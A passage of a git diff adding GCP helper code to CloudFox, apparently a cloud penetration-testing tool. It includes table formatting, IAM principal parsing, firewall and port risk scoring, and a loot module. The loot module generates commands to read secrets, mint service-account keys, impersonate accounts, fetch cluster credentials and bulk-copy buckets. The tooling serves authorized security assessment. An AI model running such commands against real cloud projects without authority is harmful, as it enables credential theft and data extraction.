{ + return false + } + } + return true +} + +// None returns true if no items match the predicate +func None[T any](items []T, predicate func(T) bool) bool { + return !Any(items, predicate) +} + +// Contains checks if a slice contains a specific value +func Contains[T comparable](items []T, value T) bool { + for _, item := range items { + if item == value { + return true + } + } + return false +} + +// ContainsString checks if a string slice contains a specific string +func ContainsString(items []string, value string) bool { + return Contains(items, value) +} + +// Deduplicate removes duplicate items from a slice (preserves order) +func Deduplicate[T comparable](items []T) []T { + seen := make(map[T]bool) + var result []T + for _, item := range items { + if !seen[item] { + seen[item] = true + result = append(result, item) + } + } + return result +} + +// Partition splits items into two slices based on a predicate +// First slice contains items where predicate is true, +// second slice contains items where predicate is false +func Partition[T any](items []T, predicate func(T) bool) ([]T, []T) { + var trueItems, falseItems []T + for _, item := range items { + if predicate(item) { + trueItems = append(trueItems, item) + } else { + falseItems = append(falseItems, item) + } + } + return trueItems, falseItems +} diff --git a/gcp/shared/doc.go b/gcp/shared/doc.go new file mode 100644 index 00000000..d1575572 --- /dev/null +++ b/gcp/shared/doc.go @@ -0,0 +1,117 @@ +// Package shared provides common utilities for GCP CloudFox modules. +// +// This package contains helper functions and types that are used across multiple +// GCP command modules to reduce code duplication and ensure consistency. +// +// # Package Organization +// +// The shared package is organized into several files by functionality: +// +// - principals.go: IAM principal type detection and parsing utilities +// - formatting.go: Table formatting helpers (bool to string, truncation, etc.) +// - risk.go: Risk assessment constants, types, and utilities +// - loot.go: Loot file management and command formatting helpers +// - aggregate.go: Generic aggregation utilities for per-project data +// +// # Principal Utilities +// +// The principals.go file provides functions for working with GCP IAM principals: +// +// // Get the type of a principal +// principalType := shared.GetPrincipalType("user:admin@example.com") // "User" +// +// // Check if a principal is public +// if shared.IsPublicPrincipal("allUsers") { +// // Handle public access +// } +// +// // Extract email from principal string +// email := shared.ExtractPrincipalEmail("serviceAccount:sa@project.iam.gserviceaccount.com") +// +// # Formatting Utilities +// +// The formatting.go file provides helpers for table and output formatting: +// +// // Convert bool to display string +// shared.BoolToYesNo(true) // "Yes" +// shared.BoolToEnabled(false) // "Disabled" +// +// // Format lists for display +// shared.FormatList([]string{"a", "b", "c", "d", "e"}, 3) // "a, b, c (+2 more)" +// +// // Extract resource names from paths +// shared.ExtractResourceName("projects/my-project/locations/us-central1/functions/my-func") +// // Returns: "my-func" +// +// # Risk Assessment +// +// The risk.go file provides standardized risk assessment utilities: +// +// // Use standard risk level constants +// if riskLevel == shared.RiskCritical { +// // Handle critical risk +// } +// +// // Track risk counts +// counts := &shared.RiskCounts{} +// counts.Add(shared.RiskHigh) +// counts.Add(shared.RiskMedium) +// fmt.Println(counts.Summary()) // "1 HIGH, 1 MEDIUM" +// +// // Assess specific risks +// level := shared.AssessRoleRisk("roles/owner") // "CRITICAL" +// +// # Loot File Management +// +// The loot.go file provides helpers for creating and managing loot files: +// +// // Create a loot file manager +// lootMgr := shared.NewLootFileManager() +// +// // Initialize and add content +// lootMgr.CreateLootFile(projectID, "buckets-commands", +// shared.LootHeaderCommands("buckets", "Storage bucket access commands")) +// lootMgr.AddToLoot(projectID, "buckets-commands", +// shared.FormatGcloudCommand("List bucket", "gsutil ls gs://my-bucket/")) +// +// // Get formatted command strings +// cmd := shared.GcloudAccessSecretVersion("my-project", "my-secret", "latest") +// +// # Aggregation Utilities +// +// The aggregate.go file provides generic functions for combining per-project data: +// +// // Aggregate from per-project maps +// allBuckets := shared.AggregateFromProjects(projectBucketsMap) +// +// // Filter and transform +// publicBuckets := shared.FilterItems(allBuckets, func(b Bucket) bool { +// return b.IsPublic +// }) +// +// // Group by field +// bucketsByRegion := shared.GroupBy(allBuckets, func(b Bucket) string { +// return b.Region +// }) +// +// # Usage in Modules +// +// Import the shared package in GCP command modules: +// +// import ( +// "github.com/BishopFox/cloudfox/gcp/shared" +// ) +// +// func (m *MyModule) processResource(resource Resource) { +// principalType := shared.GetPrincipalType(resource.Principal) +// riskLevel := shared.AssessRoleRisk(resource.Role) +// +// if shared.IsPublicPrincipal(resource.Principal) { +// m.addToLoot(shared.FormatExploitEntry( +// "Public Access", +// "Resource is publicly accessible", +// shared.GsutilList(resource.BucketName), +// )) +// } +// } +package shared diff --git a/gcp/shared/formatting.go b/gcp/shared/formatting.go new file mode 100644 index 00000000..fc11fa68 --- /dev/null +++ b/gcp/shared/formatting.go @@ -0,0 +1,219 @@ +package shared + +import ( + "fmt" + "strings" +) + +// BoolToYesNo converts a boolean to "Yes" or "No" string. +// Useful for table display where boolean values should be human-readable. +func BoolToYesNo(b bool) string { + if b { + return "Yes" + } + return "No" +} + +// BoolToEnabled converts a boolean to "Enabled" or "Disabled" string. +func BoolToEnabled(b bool) string { + if b { + return "Enabled" + } + return "Disabled" +} + +// BoolToCheck converts a boolean to a checkmark or empty string. +// Useful for table columns showing presence/absence of a feature. +func BoolToCheck(b bool) string { + if b { + return "✓" + } + return "" +} + +// BoolToStatus converts a boolean to "Active" or "Inactive" string. +func BoolToStatus(b bool) string { + if b { + return "Active" + } + return "Inactive" +} + +// TruncateString truncates a string to maxLen characters, adding "..." if truncated. +func TruncateString(s string, maxLen int) string { + if len(s) <= maxLen { + return s + } + if maxLen <= 3 { + return s[:maxLen] + } + return s[:maxLen-3] + "..." +} + +// TruncateMiddle truncates a string in the middle, keeping the start and end. +// Useful for long resource names where both prefix and suffix are informative. +func TruncateMiddle(s string, maxLen int) string { + if len(s) <= maxLen { + return s + } + if maxLen <= 5 { + return s[:maxLen] + } + keepLen := (maxLen - 3) / 2 + return s[:keepLen] + "..." + s[len(s)-keepLen:] +} + +// FormatList formats a slice of strings for table display. +// If the list is longer than maxItems, it truncates and adds a count. +// +// Examples: +// - ["a", "b"] -> "a, b" +// - ["a", "b", "c", "d", "e"] with maxItems=3 -> "a, b, c (+2 more)" +func FormatList(items []string, maxItems int) string { + if len(items) == 0 { + return "-" + } + if maxItems <= 0 || len(items) <= maxItems { + return strings.Join(items, ", ") + } + shown := strings.Join(items[:maxItems], ", ") + return fmt.Sprintf("%s (+%d more)", shown, len(items)-maxItems) +} + +// FormatCount formats a count with appropriate singular/plural suffix. +// +// Examples: +// - FormatCount(0, "item", "items") -> "0 items" +// - FormatCount(1, "item", "items") -> "1 item" +// - FormatCount(5, "item", "items") -> "5 items" +func FormatCount(count int, singular, plural string) string { + if count == 1 { + return fmt.Sprintf("%d %s", count, singular) + } + return fmt.Sprintf("%d %s", count, plural) +} + +// FormatBytes formats a byte count as a human-readable string. +func FormatBytes(bytes int64) string { + const unit = 1024 + if bytes < unit { + return fmt.Sprintf("%d B", bytes) + } + div, exp := int64(unit), 0 + for n := bytes / unit; n >= unit; n /= unit { + div *= unit + exp++ + } + return fmt.Sprintf("%.1f %cB", float64(bytes)/float64(div), "KMGTPE"[exp]) +} + +// DefaultString returns the value if non-empty, otherwise returns the default. +func DefaultString(value, defaultValue string) string { + if value == "" { + return defaultValue + } + return value +} + +// DefaultInt returns the value if non-zero, otherwise returns the default. +func DefaultInt(value, defaultValue int) int { + if value == 0 { + return defaultValue + } + return value +} + +// JoinNonEmpty joins non-empty strings with the given separator. +// Empty strings are filtered out before joining. +func JoinNonEmpty(sep string, items ...string) string { + var nonEmpty []string + for _, item := range items { + if item != "" { + nonEmpty = append(nonEmpty, item) + } + } + return strings.Join(nonEmpty, sep) +} + +// ExtractResourceName extracts the last component from a resource path. +// GCP resource names often have format: projects/PROJECT/locations/LOCATION/resources/NAME +// +// Examples: +// - "projects/my-project/locations/us-central1/functions/my-func" -> "my-func" +// - "my-resource" -> "my-resource" +func ExtractResourceName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} + +// ExtractProjectFromResourceName extracts the project ID from a full resource name. +// GCP resources typically have format: projects/PROJECT_ID/... +// +// Returns empty string if project cannot be extracted. +func ExtractProjectFromResourceName(resourceName string) string { + parts := strings.Split(resourceName, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} + +// ExtractLocationFromResourceName extracts the location from a full resource name. +// GCP resources often have format: projects/PROJECT/locations/LOCATION/... +// +// Returns empty string if location cannot be extracted. +func ExtractLocationFromResourceName(resourceName string) string { + parts := strings.Split(resourceName, "/") + for i, part := range parts { + if (part == "locations" || part == "regions" || part == "zones") && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} + +// SanitizeForTable removes or replaces characters that may break table formatting. +func SanitizeForTable(s string) string { + // Replace newlines and tabs with spaces + s = strings.ReplaceAll(s, "\n", " ") + s = strings.ReplaceAll(s, "\r", " ") + s = strings.ReplaceAll(s, "\t", " ") + // Collapse multiple spaces + for strings.Contains(s, " ") { + s = strings.ReplaceAll(s, " ", " ") + } + return strings.TrimSpace(s) +} + +// FormatPermissionList formats a list of permissions for display. +// Optionally highlights dangerous permissions. +func FormatPermissionList(permissions []string, maxShow int) string { + if len(permissions) == 0 { + return "-" + } + return FormatList(permissions, maxShow) +} + +// FormatRoleShort shortens a role name for table display. +// Removes the "roles/" prefix if present. +// +// Examples: +// - "roles/owner" -> "owner" +// - "roles/storage.admin" -> "storage.admin" +// - "projects/my-project/roles/customRole" -> "customRole" +func FormatRoleShort(role string) string { + if strings.HasPrefix(role, "roles/") { + return strings.TrimPrefix(role, "roles/") + } + // Handle custom roles: projects/PROJECT/roles/ROLE or organizations/ORG/roles/ROLE + parts := strings.Split(role, "/roles/") + if len(parts) == 2 { + return parts[1] + } + return role +} diff --git a/gcp/shared/loot.go b/gcp/shared/loot.go new file mode 100644 index 00000000..c527a5cd --- /dev/null +++ b/gcp/shared/loot.go @@ -0,0 +1,273 @@ +package shared + +import ( + "fmt" + "strings" + + "github.com/BishopFox/cloudfox/internal" +) + +// LootFileManager helps manage loot file creation and content addition +// for GCP modules with per-project organization. +type LootFileManager struct { + // LootMap stores loot files organized by projectID -> lootFileName -> LootFile + LootMap map[string]map[string]*internal.LootFile +} + +// NewLootFileManager creates a new LootFileManager +func NewLootFileManager() *LootFileManager { + return &LootFileManager{ + LootMap: make(map[string]map[string]*internal.LootFile), + } +} + +// InitializeProject ensures the project has an initialized loot map +func (l *LootFileManager) InitializeProject(projectID string) { + if l.LootMap[projectID] == nil { + l.LootMap[projectID] = make(map[string]*internal.LootFile) + } +} + +// CreateLootFile creates a new loot file for a project with a header +func (l *LootFileManager) CreateLootFile(projectID, fileName, header string) { + l.InitializeProject(projectID) + l.LootMap[projectID][fileName] = &internal.LootFile{ + Name: fileName, + Contents: header, + } +} + +// AddToLoot adds content to a loot file +func (l *LootFileManager) AddToLoot(projectID, fileName, content string) { + l.InitializeProject(projectID) + if lootFile, exists := l.LootMap[projectID][fileName]; exists && lootFile != nil { + lootFile.Contents += content + } +} + +// GetLootFile retrieves a loot file for a project +func (l *LootFileManager) GetLootFile(projectID, fileName string) *internal.LootFile { + if projectLoot, exists := l.LootMap[projectID]; exists { + return projectLoot[fileName] + } + return nil +} + +// GetAllLootFiles returns all loot files across all projects as a flat slice +func (l *LootFileManager) GetAllLootFiles() []internal.LootFile { + var allLoot []internal.LootFile + for _, projectLoot := range l.LootMap { + for _, lootFile := range projectLoot { + if lootFile != nil && lootFile.Contents != "" { + allLoot = append(allLoot, *lootFile) + } + } + } + return allLoot +} + +// GetProjectLootFiles returns all loot files for a specific project +func (l *LootFileManager) GetProjectLootFiles(projectID string) []internal.LootFile { + var lootFiles []internal.LootFile + if projectLoot, exists := l.LootMap[projectID]; exists { + for _, lootFile := range projectLoot { + if lootFile != nil && lootFile.Contents != "" { + lootFiles = append(lootFiles, *lootFile) + } + } + } + return lootFiles +} + +// Standard loot file name suffixes +const ( + LootSuffixCommands = "commands" + LootSuffixExploitation = "exploitation" + LootSuffixEnumeration = "enumeration" + LootSuffixPrivesc = "privesc" + LootSuffixLateralMove = "lateral-movement" + LootSuffixDataExfil = "data-exfiltration" + LootSuffixHighPrivilege = "high-privilege" + LootSuffixSecurityRisks = "security-risks" + LootSuffixCredentials = "credentials" + LootSuffixSensitiveFiles = "sensitive-files" +) + +// LootFileName generates a standardized loot file name +func LootFileName(moduleName, suffix string) string { + return moduleName + "-" + suffix +} + +// Standard loot file headers + +// LootHeaderCommands returns a standard header for command loot files +func LootHeaderCommands(moduleName, description string) string { + return fmt.Sprintf(`# %s - Exploitation Commands +# Generated by CloudFox +# %s +# +# Execute these commands to interact with discovered resources. +# Always ensure you have proper authorization before running these commands. + +`, moduleName, description) +} + +// LootHeaderEnumeration returns a standard header for enumeration loot files +func LootHeaderEnumeration(moduleName, description string) string { + return fmt.Sprintf(`# %s - Further Enumeration Commands +# Generated by CloudFox +# %s +# +# Execute these commands to gather additional information. + +`, moduleName, description) +} + +// LootHeaderSecurityRisks returns a standard header for security risk loot files +func LootHeaderSecurityRisks(moduleName string) string { + return fmt.Sprintf(`# %s - Security Risks +# Generated by CloudFox +# +# This file lists potential security issues discovered during enumeration. + +`, moduleName) +} + +// Command formatting helpers + +// FormatGcloudCommand formats a gcloud CLI command for loot files +func FormatGcloudCommand(comment, command string) string { + if comment != "" { + return fmt.Sprintf("# %s\n%s\n\n", comment, command) + } + return fmt.Sprintf("%s\n\n", command) +} + +// FormatGsutilCommand formats a gsutil command for loot files +func FormatGsutilCommand(comment, command string) string { + return FormatGcloudCommand(comment, command) +} + +// FormatBqCommand formats a bq CLI command for loot files +func FormatBqCommand(comment, command string) string { + return FormatGcloudCommand(comment, command) +} + +// FormatKubectlCommand formats a kubectl command for loot files +func FormatKubectlCommand(comment, command string) string { + return FormatGcloudCommand(comment, command) +} + +// FormatCurlCommand formats a curl command for loot files +func FormatCurlCommand(comment, command string) string { + return FormatGcloudCommand(comment, command) +} + +// FormatLootSection formats a section with a header and multiple commands +func FormatLootSection(sectionHeader string, commands []string) string { + var sb strings.Builder + sb.WriteString(fmt.Sprintf("#############################################\n")) + sb.WriteString(fmt.Sprintf("# %s\n", sectionHeader)) + sb.WriteString(fmt.Sprintf("#############################################\n\n")) + for _, cmd := range commands { + sb.WriteString(cmd) + sb.WriteString("\n") + } + sb.WriteString("\n") + return sb.String() +} + +// FormatExploitEntry formats a single exploitation entry for loot files +func FormatExploitEntry(title, description, command string) string { + var sb strings.Builder + sb.WriteString(fmt.Sprintf("#############################################\n")) + sb.WriteString(fmt.Sprintf("# %s\n", title)) + if description != "" { + sb.WriteString(fmt.Sprintf("# %s\n", description)) + } + sb.WriteString(fmt.Sprintf("#############################################\n")) + sb.WriteString(command) + sb.WriteString("\n\n") + return sb.String() +} + +// FormatRiskEntry formats a risk finding for loot files +func FormatRiskEntry(riskLevel, resourceType, resourceName, description string) string { + return fmt.Sprintf("[%s] %s: %s\n Description: %s\n\n", + riskLevel, resourceType, resourceName, description) +} + +// Common GCP command templates + +// GcloudDescribeInstance returns a gcloud command to describe an instance +func GcloudDescribeInstance(projectID, zone, instanceName string) string { + return fmt.Sprintf("gcloud compute instances describe %s --zone=%s --project=%s", + instanceName, zone, projectID) +} + +// GcloudSSHInstance returns a gcloud command to SSH into an instance +func GcloudSSHInstance(projectID, zone, instanceName string) string { + return fmt.Sprintf("gcloud compute ssh %s --zone=%s --project=%s", + instanceName, zone, projectID) +} + +// GsutilList returns a gsutil command to list bucket contents +func GsutilList(bucketName string) string { + return fmt.Sprintf("gsutil ls -la gs://%s/", bucketName) +} + +// GsutilCopy returns a gsutil command to copy from a bucket +func GsutilCopy(bucketName, objectPath, localPath string) string { + if objectPath == "" { + return fmt.Sprintf("gsutil -m cp -r gs://%s/* %s", bucketName, localPath) + } + return fmt.Sprintf("gsutil cp gs://%s/%s %s", bucketName, objectPath, localPath) +} + +// GcloudAccessSecretVersion returns a gcloud command to access a secret +func GcloudAccessSecretVersion(projectID, secretName, version string) string { + if version == "" { + version = "latest" + } + return fmt.Sprintf("gcloud secrets versions access %s --secret=%s --project=%s", + version, secretName, projectID) +} + +// GcloudListSAKeys returns a gcloud command to list service account keys +func GcloudListSAKeys(projectID, saEmail string) string { + return fmt.Sprintf("gcloud iam service-accounts keys list --iam-account=%s --project=%s", + saEmail, projectID) +} + +// GcloudCreateSAKey returns a gcloud command to create a service account key +func GcloudCreateSAKey(projectID, saEmail, outputFile string) string { + return fmt.Sprintf("gcloud iam service-accounts keys create %s --iam-account=%s --project=%s", + outputFile, saEmail, projectID) +} + +// GcloudImpersonateSA returns a gcloud command to impersonate a service account +func GcloudImpersonateSA(saEmail, command string) string { + return fmt.Sprintf("gcloud %s --impersonate-service-account=%s", command, saEmail) +} + +// GcloudGetClusterCredentials returns a gcloud command to get GKE cluster credentials +func GcloudGetClusterCredentials(projectID, location, clusterName string) string { + locFlag := "--region" + if !strings.Contains(location, "-") || len(strings.Split(location, "-")) == 3 { + locFlag = "--zone" + } + return fmt.Sprintf("gcloud container clusters get-credentials %s %s=%s --project=%s", + clusterName, locFlag, location, projectID) +} + +// BqQuery returns a bq command to run a query +func BqQuery(projectID, query string) string { + return fmt.Sprintf("bq query --project_id=%s --use_legacy_sql=false '%s'", + projectID, query) +} + +// BqExtract returns a bq command to extract a table to GCS +func BqExtract(projectID, dataset, table, gcsPath string) string { + return fmt.Sprintf("bq extract --project_id=%s %s.%s %s", + projectID, dataset, table, gcsPath) +} diff --git a/gcp/shared/network.go b/gcp/shared/network.go new file mode 100644 index 00000000..e9e7979b --- /dev/null +++ b/gcp/shared/network.go @@ -0,0 +1,346 @@ +package shared + +import ( + "fmt" + "strconv" + "strings" +) + +// Public CIDR constants +const ( + CIDRAllIPv4 = "0.0.0.0/0" + CIDRAllIPv6 = "::/0" + // Broad ranges that are effectively public + CIDRHalfIPv4Low = "0.0.0.0/1" + CIDRHalfIPv4High = "128.0.0.0/1" +) + +// IsPublicCIDR checks if a CIDR range represents public/internet access. +// Returns true for 0.0.0.0/0, ::/0, and other effectively-public ranges. +func IsPublicCIDR(cidr string) bool { + cidr = strings.TrimSpace(cidr) + switch cidr { + case CIDRAllIPv4, CIDRAllIPv6, CIDRHalfIPv4Low, CIDRHalfIPv4High: + return true + } + return false +} + +// HasPublicCIDR checks if any CIDR in the slice represents public access. +func HasPublicCIDR(cidrs []string) bool { + for _, cidr := range cidrs { + if IsPublicCIDR(cidr) { + return true + } + } + return false +} + +// IsPrivateIP checks if an IP address is in a private range. +// Private ranges: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16 +func IsPrivateIP(ip string) bool { + // Handle CIDR notation + if idx := strings.Index(ip, "/"); idx != -1 { + ip = ip[:idx] + } + + parts := strings.Split(ip, ".") + if len(parts) != 4 { + return false + } + + first, err := strconv.Atoi(parts[0]) + if err != nil { + return false + } + + // 10.0.0.0/8 + if first == 10 { + return true + } + + // 172.16.0.0/12 + if first == 172 { + second, err := strconv.Atoi(parts[1]) + if err != nil { + return false + } + if second >= 16 && second <= 31 { + return true + } + } + + // 192.168.0.0/16 + if first == 192 { + second, err := strconv.Atoi(parts[1]) + if err != nil { + return false + } + if second == 168 { + return true + } + } + + return false +} + +// SensitivePort represents a port with security implications +type SensitivePort struct { + Port int + Protocol string + Service string + Risk string + Description string +} + +// SensitivePorts maps port numbers to their security information +var SensitivePorts = map[int]SensitivePort{ + // Remote Access + 22: {22, "TCP", "SSH", RiskHigh, "Remote shell access"}, + 23: {23, "TCP", "Telnet", RiskCritical, "Unencrypted remote access"}, + 3389: {3389, "TCP", "RDP", RiskHigh, "Remote Desktop Protocol"}, + 5900: {5900, "TCP", "VNC", RiskHigh, "Virtual Network Computing"}, + 5985: {5985, "TCP", "WinRM-HTTP", RiskHigh, "Windows Remote Management (HTTP)"}, + 5986: {5986, "TCP", "WinRM-HTTPS", RiskMedium, "Windows Remote Management (HTTPS)"}, + + // Databases + 3306: {3306, "TCP", "MySQL", RiskHigh, "MySQL database"}, + 5432: {5432, "TCP", "PostgreSQL", RiskHigh, "PostgreSQL database"}, + 1433: {1433, "TCP", "MSSQL", RiskHigh, "Microsoft SQL Server"}, + 1521: {1521, "TCP", "Oracle", RiskHigh, "Oracle database"}, + 27017: {27017, "TCP", "MongoDB", RiskHigh, "MongoDB database"}, + 6379: {6379, "TCP", "Redis", RiskHigh, "Redis (often no auth)"}, + 9042: {9042, "TCP", "Cassandra", RiskMedium, "Cassandra database"}, + 5984: {5984, "TCP", "CouchDB", RiskMedium, "CouchDB database"}, + 9200: {9200, "TCP", "Elasticsearch", RiskHigh, "Elasticsearch (often no auth)"}, + + // Web/API + 80: {80, "TCP", "HTTP", RiskMedium, "Unencrypted web traffic"}, + 443: {443, "TCP", "HTTPS", RiskLow, "Encrypted web traffic"}, + 8080: {8080, "TCP", "HTTP-Alt", RiskMedium, "Alternative HTTP"}, + 8443: {8443, "TCP", "HTTPS-Alt", RiskLow, "Alternative HTTPS"}, + + // Infrastructure + 53: {53, "TCP/UDP", "DNS", RiskMedium, "DNS queries/transfers"}, + 25: {25, "TCP", "SMTP", RiskMedium, "Email relay"}, + 110: {110, "TCP", "POP3", RiskMedium, "Email retrieval (unencrypted)"}, + 143: {143, "TCP", "IMAP", RiskMedium, "Email retrieval (unencrypted)"}, + 389: {389, "TCP", "LDAP", RiskHigh, "Directory services (unencrypted)"}, + 636: {636, "TCP", "LDAPS", RiskMedium, "Directory services (encrypted)"}, + 445: {445, "TCP", "SMB", RiskCritical, "Windows file sharing"}, + 137: {137, "UDP", "NetBIOS-NS", RiskHigh, "NetBIOS Name Service"}, + 138: {138, "UDP", "NetBIOS-DG", RiskHigh, "NetBIOS Datagram"}, + 139: {139, "TCP", "NetBIOS-SS", RiskHigh, "NetBIOS Session"}, + 111: {111, "TCP/UDP", "RPC", RiskHigh, "Remote Procedure Call"}, + 2049: {2049, "TCP/UDP", "NFS", RiskHigh, "Network File System"}, + + // Container/Orchestration + 2375: {2375, "TCP", "Docker-Unencrypted", RiskCritical, "Docker API (unencrypted)"}, + 2376: {2376, "TCP", "Docker-TLS", RiskMedium, "Docker API (TLS)"}, + 6443: {6443, "TCP", "Kubernetes-API", RiskHigh, "Kubernetes API server"}, + 10250: {10250, "TCP", "Kubelet", RiskHigh, "Kubelet API"}, + 10255: {10255, "TCP", "Kubelet-RO", RiskMedium, "Kubelet read-only API"}, + 2379: {2379, "TCP", "etcd", RiskCritical, "etcd (K8s secrets)"}, + + // Monitoring + 9090: {9090, "TCP", "Prometheus", RiskMedium, "Prometheus metrics"}, + 3000: {3000, "TCP", "Grafana", RiskMedium, "Grafana dashboard"}, + 8500: {8500, "TCP", "Consul", RiskMedium, "HashiCorp Consul"}, + + // Message Queues + 5672: {5672, "TCP", "AMQP", RiskMedium, "RabbitMQ"}, + 15672: {15672, "TCP", "RabbitMQ-Mgmt", RiskMedium, "RabbitMQ management"}, + 9092: {9092, "TCP", "Kafka", RiskMedium, "Apache Kafka"}, + + // Other + 11211: {11211, "TCP", "Memcached", RiskHigh, "Memcached (often no auth)"}, + 6666: {6666, "TCP", "IRC", RiskMedium, "IRC (potential backdoor)"}, + 4444: {4444, "TCP", "Metasploit", RiskCritical, "Common Metasploit port"}, +} + +// IsSensitivePort checks if a port is considered security-sensitive +func IsSensitivePort(port int) bool { + _, exists := SensitivePorts[port] + return exists +} + +// GetPortInfo returns information about a port if it's sensitive +func GetPortInfo(port int) (SensitivePort, bool) { + info, exists := SensitivePorts[port] + return info, exists +} + +// GetPortRisk returns the risk level for a port (or RiskLow if not sensitive) +func GetPortRisk(port int) string { + if info, exists := SensitivePorts[port]; exists { + return info.Risk + } + return RiskLow +} + +// AssessFirewallRuleRisk assesses the risk of a firewall rule based on its configuration +func AssessFirewallRuleRisk(isIngress bool, isPublic bool, allowsAllPorts bool, ports []int) string { + // Egress rules are generally lower risk + if !isIngress { + if isPublic && allowsAllPorts { + return RiskMedium + } + return RiskLow + } + + // Ingress rules from public internet + if isPublic { + if allowsAllPorts { + return RiskCritical // All ports from internet = critical + } + + // Check for sensitive ports + for _, port := range ports { + if info, exists := SensitivePorts[port]; exists { + if info.Risk == RiskCritical { + return RiskCritical + } + } + } + + // Any public ingress with specific ports is at least high risk + return RiskHigh + } + + // Internal ingress rules + if allowsAllPorts { + return RiskMedium + } + + return RiskLow +} + +// FirewallRuleIssues identifies security issues with a firewall rule +func FirewallRuleIssues(isIngress bool, isPublic bool, allowsAllPorts bool, ports []int, hasTargetTags bool, loggingEnabled bool) []string { + var issues []string + + if isIngress { + if isPublic { + issues = append(issues, "Allows traffic from 0.0.0.0/0 (internet)") + } + + if allowsAllPorts { + issues = append(issues, "Allows ALL ports") + } + + // Check for sensitive ports exposed to internet + if isPublic { + for _, port := range ports { + if info, exists := SensitivePorts[port]; exists { + issues = append(issues, fmt.Sprintf("Exposes %s (%d) to internet", info.Service, port)) + } + } + } + + if !hasTargetTags { + issues = append(issues, "No target tags - applies to ALL instances") + } + } + + if !loggingEnabled { + issues = append(issues, "Firewall logging disabled") + } + + return issues +} + +// FormatPortRange formats a port range for display +func FormatPortRange(startPort, endPort int) string { + if startPort == endPort { + return fmt.Sprintf("%d", startPort) + } + return fmt.Sprintf("%d-%d", startPort, endPort) +} + +// ParsePortRange parses a port range string like "80" or "8000-9000" +func ParsePortRange(portStr string) (start, end int, err error) { + portStr = strings.TrimSpace(portStr) + + if strings.Contains(portStr, "-") { + parts := strings.Split(portStr, "-") + if len(parts) != 2 { + return 0, 0, fmt.Errorf("invalid port range: %s", portStr) + } + start, err = strconv.Atoi(strings.TrimSpace(parts[0])) + if err != nil { + return 0, 0, err + } + end, err = strconv.Atoi(strings.TrimSpace(parts[1])) + if err != nil { + return 0, 0, err + } + return start, end, nil + } + + port, err := strconv.Atoi(portStr) + if err != nil { + return 0, 0, err + } + return port, port, nil +} + +// ExpandPortRanges expands port range strings to individual ports (up to a limit) +func ExpandPortRanges(portRanges []string, maxPorts int) []int { + var ports []int + seen := make(map[int]bool) + + for _, rangeStr := range portRanges { + start, end, err := ParsePortRange(rangeStr) + if err != nil { + continue + } + + for p := start; p <= end && len(ports) < maxPorts; p++ { + if !seen[p] { + seen[p] = true + ports = append(ports, p) + } + } + } + + return ports +} + +// Protocol constants +const ( + ProtocolTCP = "tcp" + ProtocolUDP = "udp" + ProtocolICMP = "icmp" + ProtocolAll = "all" +) + +// IsAllProtocols checks if the protocol specification allows all protocols +func IsAllProtocols(protocol string) bool { + protocol = strings.ToLower(strings.TrimSpace(protocol)) + return protocol == "all" || protocol == "*" || protocol == "" +} + +// NetworkEndpointType categorizes network endpoints +type NetworkEndpointType string + +const ( + EndpointTypePublicIP NetworkEndpointType = "Public IP" + EndpointTypePrivateIP NetworkEndpointType = "Private IP" + EndpointTypeLoadBalancer NetworkEndpointType = "Load Balancer" + EndpointTypeNAT NetworkEndpointType = "NAT Gateway" + EndpointTypeVPNTunnel NetworkEndpointType = "VPN Tunnel" + EndpointTypeInterconnect NetworkEndpointType = "Interconnect" + EndpointTypePrivateService NetworkEndpointType = "Private Service Connect" + EndpointTypeInternal NetworkEndpointType = "Internal" +) + +// CategorizeEndpoint determines the type of a network endpoint +func CategorizeEndpoint(ipOrURL string, isExternal bool) NetworkEndpointType { + if isExternal { + return EndpointTypePublicIP + } + if IsPrivateIP(ipOrURL) { + return EndpointTypePrivateIP + } + return EndpointTypeInternal +} diff --git a/gcp/shared/principals.go b/gcp/shared/principals.go new file mode 100644 index 00000000..7a7dff34 --- /dev/null +++ b/gcp/shared/principals.go @@ -0,0 +1,170 @@ +// Package shared provides common utilities for GCP CloudFox modules. +// This package contains helper functions for IAM principals, formatting, +// risk assessment, and other cross-cutting concerns. +package shared + +import "strings" + +// PrincipalType constants for IAM member types +const ( + PrincipalTypePublic = "PUBLIC" + PrincipalTypeAllAuthenticated = "ALL_AUTHENTICATED" + PrincipalTypeUser = "User" + PrincipalTypeServiceAccount = "ServiceAccount" + PrincipalTypeGroup = "Group" + PrincipalTypeDomain = "Domain" + PrincipalTypeProjectOwner = "ProjectOwner" + PrincipalTypeProjectEditor = "ProjectEditor" + PrincipalTypeProjectViewer = "ProjectViewer" + PrincipalTypeDeleted = "Deleted" + PrincipalTypeUnknown = "Unknown" +) + +// Lowercase principal type constants (for consistency with some existing code) +const ( + PrincipalTypeLowerUser = "user" + PrincipalTypeLowerServiceAccount = "serviceAccount" + PrincipalTypeLowerGroup = "group" + PrincipalTypeLowerUnknown = "unknown" +) + +// GetPrincipalType extracts the type of an IAM principal from its full member string. +// This handles the standard GCP IAM member format (e.g., "user:email@example.com"). +// Returns a capitalized type suitable for table display. +// +// Examples: +// - "allUsers" -> "PUBLIC" +// - "allAuthenticatedUsers" -> "ALL_AUTHENTICATED" +// - "user:admin@example.com" -> "User" +// - "serviceAccount:sa@project.iam.gserviceaccount.com" -> "ServiceAccount" +// - "group:devs@example.com" -> "Group" +// - "domain:example.com" -> "Domain" +func GetPrincipalType(member string) string { + switch { + case member == "allUsers": + return PrincipalTypePublic + case member == "allAuthenticatedUsers": + return PrincipalTypeAllAuthenticated + case strings.HasPrefix(member, "user:"): + return PrincipalTypeUser + case strings.HasPrefix(member, "serviceAccount:"): + return PrincipalTypeServiceAccount + case strings.HasPrefix(member, "group:"): + return PrincipalTypeGroup + case strings.HasPrefix(member, "domain:"): + return PrincipalTypeDomain + case strings.HasPrefix(member, "projectOwner:"): + return PrincipalTypeProjectOwner + case strings.HasPrefix(member, "projectEditor:"): + return PrincipalTypeProjectEditor + case strings.HasPrefix(member, "projectViewer:"): + return PrincipalTypeProjectViewer + case strings.HasPrefix(member, "deleted:"): + return PrincipalTypeDeleted + default: + return PrincipalTypeUnknown + } +} + +// GetPrincipalTypeLower returns the principal type in lowercase format. +// This is useful when consistent lowercase output is needed. +// +// Examples: +// - "user:admin@example.com" -> "user" +// - "serviceAccount:sa@project.iam.gserviceaccount.com" -> "serviceAccount" +// - "group:devs@example.com" -> "group" +func 